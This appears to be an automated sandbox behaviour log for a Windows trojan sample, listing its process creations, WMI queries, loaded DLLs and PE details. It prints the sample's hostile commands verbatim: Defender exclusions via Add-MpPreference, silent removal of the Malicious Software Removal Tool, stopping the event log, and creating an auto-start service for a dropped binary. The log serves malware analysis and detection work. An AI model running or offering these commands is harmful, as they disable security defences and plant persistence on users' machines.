          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\mcqqajuoiblhnzuh
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3o2mnnd.u10.ps1Jump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PHVUTTIO"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PHVUTTIO"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\utblsmnncewd\bbecxurdegum.exe C:\ProgramData\utblsmnncewd\bbecxurdegum.exe
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "PHVUTTIO"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "PHVUTTIO" binpath= "C:\ProgramData\utblsmnncewd\bbecxurdegum.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "PHVUTTIO"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic file information: File size 2625536 > 1048576
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
          Source: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: bbecxurdegum.exe, 00000010.00000003.2132571652.000001A0F42E0000.00000004.00000001.00020000.00000000.sdmp, clwjpwuuvdte.sys.16.dr
